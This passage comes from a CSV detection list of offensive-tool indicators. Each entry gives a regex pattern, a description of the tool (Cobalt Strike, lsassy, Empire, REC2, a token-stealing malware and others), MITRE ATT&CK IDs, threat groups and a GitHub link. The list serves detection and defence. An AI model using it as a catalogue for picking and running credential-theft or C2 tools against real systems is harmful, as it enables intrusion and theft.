- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*rdrleakdiag.py*",".{0,1000}rdrleakdiag\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*read_cs_teamserver*",".{0,1000}read_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*readShellcode*",".{0,1000}readShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners 
and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ReadyToPhish.xls*",".{0,1000}ReadyToPhish\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*reagentc /disable >nul*",".{0,1000}reagentc\s\/disable\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*RealBey/ThisIsNotRat*",".{0,1000}RealBey\/ThisIsNotRat.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computer from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*realgam3*",".{0,1000}realgam3.{0,1000}","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Real-Passwords*",".{0,1000}Real\-Passwords.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - 
T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Reaper.exe kp *",".{0,1000}Reaper\.exe\skp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Reaper.exe sp *",".{0,1000}Reaper\.exe\ssp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*Reaper-main.zip*",".{0,1000}Reaper\-main\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*rebootuser/LinEnum*",".{0,1000}rebootuser\/LinEnum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*REC2 implant for Mastodon*",".{0,1000}REC2\simplant\sfor\sMastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*REC2 implant for VirusTotal*",".{0,1000}REC2\simplant\sfor\sVirusTotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2::modules::rec2mastodon*",".{0,1000}rec2\:\:modules\:\:rec2mastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from 
VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2_mastodon_x64.exe*",".{0,1000}rec2_mastodon_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2_virustotal_x64.exe*",".{0,1000}rec2_virustotal_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2mastodon.rs*",".{0,1000}rec2mastodon\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*rec2virustotal*",".{0,1000}rec2virustotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" 
"*rec2virustotal.rs*",".{0,1000}rec2virustotal\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*Receive a file via DoH*",".{0,1000}Receive\sa\sfile\svia\sDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Receive-AgentJob*",".{0,1000}Receive\-AgentJob.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Received Mythic SOCKS task: *",".{0,1000}Received\sMythic\sSOCKS\stask\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*reciclador.cpp*",".{0,1000}reciclador\.cpp.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - 
T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.dll*",".{0,1000}reciclador\.dll.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.vcxproj*",".{0,1000}reciclador\.vcxproj.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*recon_passive.rb*",".{0,1000}recon_passive\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Recon-AD-*.dll*",".{0,1000}Recon\-AD\-.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-*.sln*",".{0,1000}Recon\-AD\-.{0,1000}\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 
- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-*.vcxproj*",".{0,1000}Recon\-AD\-.{0,1000}\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-AllLocalGroups*",".{0,1000}Recon\-AD\-AllLocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Computers All*",".{0,1000}Recon\-AD\-Computers\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" 
"*Recon-AD-Domain*",".{0,1000}Recon\-AD\-Domain.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Groups All*",".{0,1000}Recon\-AD\-Groups\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-LocalGroups*",".{0,1000}Recon\-AD\-LocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-SPNs*",".{0,1000}Recon\-AD\-SPNs.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Users All*",".{0,1000}Recon\-AD\-Users\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*Recon-AD-Users.*",".{0,1000}Recon\-AD\-Users\..{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 